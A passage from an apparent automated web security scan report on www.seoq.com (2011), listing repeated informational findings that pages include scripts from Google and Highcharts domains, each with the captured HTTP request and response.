24.47. http://www.seoq.com/quotient/2011/04/22/2272/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/04/22/2272/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/04/22/2272/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:48:48 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:48:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.48. http://www.seoq.com/quotient/2011/05/01/2837/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2837/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2837/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:51:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:51:30 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.49. http://www.seoq.com/quotient/2011/05/01/2838/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2838/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2838/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:42 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:43 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.50. http://www.seoq.com/quotient/2011/05/01/2839/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2839/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2839/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:57 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:58 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.51. http://www.seoq.com/quotient/2011/05/01/2840/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2840/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2840/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:50:29 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5; expires=Mon, 09-May-2011 02:50:31 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.52. http://www.seoq.com/quotient/2011/05/01/2841/N

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/2011/05/01/2841/N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /quotient/2011/05/01/2841/N HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com
Cookie: CAKEPHP=dkaa53tj1enbfd1m92sjl0dse5

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:49:32 GMT
Server: Apache
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=deleted; expires=Sun, 02-May-2010 02:49:32 GMT; path=/quotient
Set-Cookie: CAKEPHP=0hbqg71t59dl83tcb9iuhil4o6; expires=Mon, 09-May-2011 02:49:33 GMT; path=/quotient
Set-Cookie: CAKEPHP=0hbqg71t59dl83tcb9iuhil4o6; expires=Mon, 09-May-2011 02:49:34 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 46086

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide-full.min.js"></script>
<script type="text/javascript" src="http://www.highcharts.com/highslide/highslide.config.js" charset="utf-8"></script>
...[SNIP]...

24.53. http://www.seoq.com/quotient/analysis/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /quotient/analysis/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /quotient/analysis/ HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/webstatshq/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:32:48 GMT
Server: Apache
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Set-Cookie: CAKEPHP=p84gesk7v1bk0c3dmkbop21ss0; expires=Mon, 09-May-2011 02:32:49 GMT; path=/quotient
Content-Type: text/html; charset=UTF-8
Content-Length: 14232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>SEO Diagnostics Tool</t
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

24.54. http://www.seoq.com/web/img/bg-seo-quotient-tool-button.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /web/img/bg-seo-quotient-tool-button.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /web/img/bg-seo-quotient-tool-button.jpg HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Referer: http://www.seoq.com/quotient/analysis/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.0 404 Not Found
Date: Mon, 02 May 2011 02:33:48 GMT
Server: Apache
Set-Cookie: CAKEPHP=sj9juf9refplohbur110cihta7; expires=Thu, 01-May-2036 08:33:49 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Length: 7911
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta http-equiv="Content-Type" con
...[SNIP]...
</form>
<script src="http://www.google.com/cse/brand?form=cse-search-box&amp;lang=en" type="text/javascript"></script>
...[SNIP]...

24.55. http://www.seoq.com/webstatshq/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webstatshq/favicon.ico HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=84ovc21s3vtovhoj4kq864i715; __utmz=98813212.1304319916.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=98813212.996978159.1304319916.1304319916.1304319916.1; __utmc=98813212; __utmb=98813212.1.10.1304319916

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:29:01 GMT
Server: Apache
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:29:04 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.56. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /webstatshq/www.onlinemicrofiche.com HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=doqq36j3lfipqlju261e9vveq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 57234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>www.onlinemicrofich
...[SNIP]...
</script>    
   <script type='text/javascript' src='http://www.google.com/jsapi'></script>
...[SNIP]...
<body onload="socialBuzz(escape('onlinemicrofiche.com'));">

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.57. http://www.seoq.com/wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=dmrsl377t3kamtrburghhgs7h7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.58. http://www.seoq.com/wp-content/uploads/2008/07/plastic-business-card.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/plastic-business-card.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/plastic-business-card.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:44:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=bsdds49l14shn4f75a79hscdv7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:44:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.59. http://www.seoq.com/wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=thqpn70su4cv7ht7rbrref0ja4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.60. http://www.seoq.com/wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=dler6f6f9e9el2gd44qef454c7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.61. http://www.seoq.com/wp-content/uploads/2008/07/wordpress-for-iphone.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/wordpress-for-iphone.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/wordpress-for-iphone.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=a90bq0ka7dbph6a2c3i6ra6757; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.62. http://www.seoq.com/wp-content/uploads/2008/07/wordpress-users-guide.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/wordpress-users-guide.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/07/wordpress-users-guide.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=5uvpfm92vhm8sjc050353p2280; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.63. http://www.seoq.com/wp-content/uploads/2008/08/before-en.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/before-en.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/08/before-en.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:35 GMT
Server: Apache
Set-Cookie: PHPSESSID=e3tmqsse418t5e97gc66chvei2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.64. http://www.seoq.com/wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
